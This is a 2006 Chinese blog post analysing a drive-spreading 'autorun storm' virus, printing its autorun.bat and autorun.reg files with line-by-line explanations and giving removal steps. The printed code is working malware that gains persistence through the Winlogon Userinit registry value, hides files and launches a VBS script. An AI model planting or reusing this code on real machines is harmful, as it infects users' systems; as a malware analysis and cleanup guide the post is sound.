首页 | 博客群 | 公社 | 专栏 | 论坛 | 图片 | 商城 | 汽车 | 注册 | 帮助 | 博客联播 | 随机访问
追求幸福的穷人互相伤害- -| 回首页 | 2006年索引 | - -12月31日:2006年的最后一天

copy.exe病毒的杀毒指导书

关键词copy.exe    autorun                                          

今天抓了一只超级搞笑的病毒,还附属杀毒说明书!!!!

症状:

一打开硬盘盘符就提示缺少copy.exe,我已经把那个东东删除掉了。但是还总是自动运行,于是我就找到autorun.inf,删除之。重启以后依然是提示缺少copy.exe。我就纳闷了。后来发现了一堆autorun开头的文件,我们先来看这个:

文件一:Autorun.bat

@echo off  //不显示系统提示符
rem autorun风暴   //病毒名称:autorun风暴
if exist .\autorun.reg regedit /s .\autorun.reg  //如果存在该目录下的autoun.reg注册表文件写入注册表
if not "%1"=="" goto open   //注册表文件导入成功,进入open标记处。
if exist autorun.vbs start WScript.exe autorun.vbs&exit  //如果存在autorun.vbs,则使用WScript.exe将VBS文件运行,然后退出。
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit  //如果系统目录下的system32内有autorun.vbs,那么用WScript.exe运行VBS,然后退出。
exit  //退出
:open  //标记为open
if not "%1"=="Open" goto next  //如果open成功,进入next标记
start explorer .\   //开始当前目录
exit  // 退出
:next  //标记为netx
if not "%1"=="Over" goto :next2  //如果标记不成功,进入next2标记
if exist .\autorun.bin type .\autorun.bin >C:\autorun.txt&&exit   //如果当前目录存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。
if exist %SYSTEMROOT%\system32\autorun.bin type %SYSTEMROOT%\system32\autorun.bin >c:\autorun.txt&&exit  //如果系统目录system32下存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。

exit   //退出
:next2     //标记为next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*    //先标记所有autorun开头的文件为非系统、非只读、非隐藏、非..文件
if "%1"=="+" attrib +s +a +h +r %2\autorun.*  //先标记所有autorun开头的文件为系统、只读、隐藏、..文件
:end   //结束

文件二:Autorun.reg

Windows Registry Editor Version 5.00  //Windows 注册表编辑器 5.00创建
autorun风暴   //autorun风暴
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,autorun.bat"   //在该条目下的userinit上添加一个autorun.bat执行文件。

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000     //不显示隐藏文件。

就这两个文件告诉我们:在我们当前目录和系统目录下,C盘符或者是D盘符上,有一堆以Autorun开头的文件,包括autorun.bat,Autorun.vbs,autorun.inf,autorun.reg,autorun.txt,autorun.bin等等把它们都删除了吧!!注册表里面就是上面那两项了,也都删除好了。 

唉~~~杀毒这么多年,第一次看到有这么详细的杀毒说明书的病毒,我真是服了病毒作者了!!

【作者: 慕容不是】【访问统计:】【2006年12月28日 星期四 16:14】【 加入博采】【打印

Trackback

你可以使用这个链接引用该篇文章 http://publishblog.blogchina.com/blog/tb.b?diaryID=5996393

回复

- 评论人:woohon   2006-12-29 09:37:45  woohon的博客  

很多制造病毒的人只是恶作剧,只是他最后也无法控制了而已。所以想想造机器人的人类,今后一定要留好后路啊。
验证码:   
评论内容: